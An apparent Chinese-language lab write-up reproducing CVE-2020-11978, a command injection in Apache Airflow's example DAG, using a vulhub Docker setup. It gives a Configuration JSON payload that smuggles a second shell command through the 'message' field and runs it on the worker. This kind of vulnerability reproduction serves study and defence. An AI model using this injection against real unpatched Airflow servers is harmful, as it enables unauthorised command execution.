CVE-2020-11978
Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。
漏洞复现
cd vulhub/airflow/CVE-2020-11978
#初始化数据库
docker-compose run airflow-init
docker-compose up -d
漏洞复现
访问http://10.10.10.8:8080进入airflow管理端,将example_trigger_dag前面的Off该为On:
再点击执行按钮,在Configuration JSON中输入:{"message":"'";touch /tmp/airflow_dag_success;#"},再点Trigger执行dag:
等几秒可以看到执行成功:
到CeleryWorker容器中进行查看:
docker-compode exec airflow-worker ls -l /tmp
可以看到touch /tmp/airflow_dag_success成功被执行:
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
2023-05-23 Linux启动过程